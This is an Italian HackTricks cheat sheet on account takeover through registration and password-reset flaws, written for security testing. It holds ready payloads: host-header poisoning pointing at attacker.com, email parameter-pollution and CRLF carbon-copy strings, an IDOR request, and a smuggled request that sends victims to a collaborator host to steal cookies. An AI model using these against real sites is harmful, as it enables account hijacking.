# Vulnerabilità di Registrazione e Presa di Controllo {% hint style="success" %} Impara e pratica il Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Impara e pratica il Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Supporta HackTricks * Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)! * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
{% endhint %} ## Presa di Controllo della Registrazione ### Registrazione Duplicata * Prova a generare utilizzando un nome utente esistente * Controlla variando l'email: * maiuscole * \+1@ * aggiungi qualche punto nell'email * caratteri speciali nel nome dell'email (%00, %09, %20) * Metti caratteri neri dopo l'email: `test@test.com a` * victim@gmail.com@attacker.com * victim@attacker.com@gmail.com ### Enumerazione degli Username Controlla se riesci a capire quando un nome utente è già stato registrato all'interno dell'applicazione. ### Politica delle Password Creando un utente controlla la politica delle password (controlla se puoi usare password deboli).\ In tal caso potresti provare a bruteforza le credenziali. ### SQL Injection [**Controlla questa pagina** ](sql-injection/#insert-statement)per imparare come tentare di prendere il controllo degli account o estrarre informazioni tramite **SQL Injections** nei moduli di registrazione. ### Oauth Takeovers {% content-ref url="oauth-to-account-takeover.md" %} [oauth-to-account-takeover.md](oauth-to-account-takeover.md) {% endcontent-ref %} ### Vulnerabilità SAML {% content-ref url="saml-attacks/" %} [saml-attacks](saml-attacks/) {% endcontent-ref %} ### Cambia Email Quando registrato prova a cambiare l'email e controlla se questo cambiamento è correttamente validato o se puoi cambiarlo in email arbitrarie. ### Ulteriori Controlli * Controlla se puoi usare **email usa e getta** * **Password** **Lunghe** (>200) portano a **DoS** * **Controlla i limiti di velocità sulla creazione degli account** * Usa username@**burp\_collab**.net e analizza il **callback** ## **Presa di Controllo del Reset della Password** ### Leak del Token di Reset della Password Via Referrer 1. Richiedi il reset della password al tuo indirizzo email 2. Clicca sul link di reset della password 3. Non cambiare la password 4. Clicca su qualsiasi sito web di terze parti (es: Facebook, Twitter) 5. Intercetta la richiesta nel proxy di Burp Suite 6. Controlla se l'intestazione referer sta rivelando il token di reset della password. ### Avvelenamento del Reset della Password 1. Intercetta la richiesta di reset della password in Burp Suite 2. Aggiungi o modifica le seguenti intestazioni in Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com` 3. Inoltra la richiesta con l'intestazione modificata\ `http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com` 4. Cerca un URL di reset della password basato sull'_intestazione host_ come: `https://attacker.com/reset-password.php?token=TOKEN` ### Reset della Password Via Parametro Email ```powershell # parameter pollution email=victim@mail.com&email=hacker@mail.com # array of emails {"email":["victim@mail.com","hacker@mail.com"]} # carbon copy email=victim@mail.com%0A%0Dcc:hacker@mail.com email=victim@mail.com%0A%0Dbcc:hacker@mail.com # separator email=victim@mail.com,hacker@mail.com email=victim@mail.com%20hacker@mail.com email=victim@mail.com|hacker@mail.com ``` ### IDOR su Parametri API 1. L'attaccante deve accedere con il proprio account e andare alla funzione **Cambia password**. 2. Avviare Burp Suite e intercettare la richiesta. 3. Inviarla alla scheda ripetitore e modificare i parametri: ID utente/email\ `powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})` ### Token di Reset Password Debole Il token di reset della password dovrebbe essere generato casualmente e unico ogni volta.\ Cerca di determinare se il token scade o se è sempre lo stesso; in alcuni casi, l'algoritmo di generazione è debole e può essere indovinato. Le seguenti variabili potrebbero essere utilizzate dall'algoritmo. * Timestamp * UserID * Email dell'utente * Nome e Cognome * Data di Nascita * Criptografia * Solo numeri * Sequenza di token piccola (caratteri tra \[A-Z,a-z,0-9]) * Riutilizzo del token * Data di scadenza del token ### Token di Reset Password in Fuga 1. Attiva una richiesta di reset della password utilizzando l'API/UI per un'email specifica, ad es: test@mail.com 2. Ispeziona la risposta del server e controlla per `resetToken` 3. Quindi utilizza il token in un URL come `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` ### Reset della Password Tramite Collisione di Nome Utente 1. Registrati nel sistema con un nome utente identico a quello della vittima, ma con spazi bianchi inseriti prima e/o dopo il nome utente. ad es: `"admin "` 2. Richiedi un reset della password con il tuo nome utente malevolo. 3. Usa il token inviato alla tua email e reimposta la password della vittima. 4. Connettiti all'account della vittima con la nuova password. La piattaforma CTFd era vulnerabile a questo attacco.\ Vedi: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) ### Presa di Controllo dell'Account Tramite Cross Site Scripting 1. Trova un XSS all'interno dell'applicazione o di un sottodominio se i cookie sono limitati al dominio principale: `*.domain.com` 2. Fuga il **cookie delle sessioni** attuali. 3. Autenticati come utente utilizzando il cookie. ### Presa di Controllo dell'Account Tramite HTTP Request Smuggling 1\. Usa **smuggler** per rilevare il tipo di HTTP Request Smuggling (CL, TE, CL.TE)\ `powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\ 2\. Crea una richiesta che sovrascriverà il `POST / HTTP/1.1` con i seguenti dati:\ `GET http://something.burpcollaborator.net HTTP/1.1 X:` con l'obiettivo di reindirizzare le vittime a burpcollab e rubare i loro cookie.\ 3\. La richiesta finale potrebbe apparire come segue ``` GET / HTTP/1.1 Transfer-Encoding: chunked Host: something.com User-Agent: Smuggler/v1.0 Content-Length: 83 0 GET http://something.burpcollaborator.net HTTP/1.1 X: X ``` Hackerone riporta l'esploitazione di questo bug\ \* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\ \* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666) ### Presa di Controllo dell'Account tramite CSRF 1. Crea un payload per il CSRF, ad esempio: “Modulo HTML con invio automatico per un cambio password” 2. Invia il payload ### Presa di Controllo dell'Account tramite JWT Il JSON Web Token potrebbe essere utilizzato per autenticare un utente. * Modifica il JWT con un altro ID Utente / Email * Controlla la firma JWT debole {% content-ref url="hacking-jwt-json-web-tokens.md" %} [hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md) {% endcontent-ref %} ## Riferimenti * [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover) {% hint style="success" %} Impara e pratica il Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Impara e pratica il Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Supporta HackTricks * Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)! * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
{% endhint %}